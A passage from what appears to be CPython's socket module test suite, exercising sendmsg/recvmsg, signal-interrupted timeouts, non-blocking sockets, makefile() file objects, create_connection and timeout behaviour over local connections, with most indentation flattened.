class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a
    # SIGALRM handler that raises ZeroDivisionError and removes it on
    # teardown, along with any scheduled alarms.
def setUp(self):
super().setUp()
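        # The handler raises ZeroDivisionError rather than returning: since
        # PEP 475, system calls interrupted by a signal are retried
        # automatically unless the handler raises, so an exception is the
        # only reliable way for these tests to observe the interruption.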
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = support.LOOPBACK_TIMEOUT
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError (from
        # the SIGALRM handler installed in setUp) when interrupted by a
        # signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (from the SIGALRM handler) when interrupted
        # by a signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
        # Pass an actual address here because Python's wrapper for
        # sendto() doesn't allow passing a zero-length one; since the
        # socket is connection-mode, POSIX requires the address to be
        # ignored anyway.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
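    # Client-side counterpart: reuse the no-op _testSetBlocking, wrapped in
    # the same cpython_only guard so that both threads skip consistently.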
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
        # bpo-7995: if accept() is called on a listening socket with a
        # timeout and the default timeout is None, the resulting socket
        # must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
        # bpo-7995: if accept() is called on a listening socket with a
        # timeout and a default timeout is set, the resulting socket
        # must inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(False)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], support.LONG_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(False)
        # the client didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], support.LONG_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
        # the client has now sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(TimeoutError, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
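        # Closing the file object returned by makefile() should drop its
        # reference to the socket, decreasing the socket's refcount by one.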
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise TimeoutError('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = socket_helper.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = socket_helper.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = socket_helper.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except TimeoutError:
pass
except OSError as exc:
if socket_helper.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('TimeoutError not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = socket_helper.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
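    # For each test below the server thread only needs to accept and close a
    # connection, so every server-side test method is an alias for
    # _justAccept(); the real assertions run in the client-side _test*
    # methods.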
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(TimeoutError, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
self.assertIs(socket.error, OSError)
self.assertIs(socket.timeout, TimeoutError)
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
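        # sock shares sock0's file descriptor; closing sock0 invalidates the
        # descriptor, so setblocking() on sock must raise OSError.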
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
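    # An AF_UNIX address starting with a NUL byte lives in Linux's abstract
    # namespace: it is not bound to the filesystem, and every byte of the
    # name (including embedded NULs) is significant.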
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
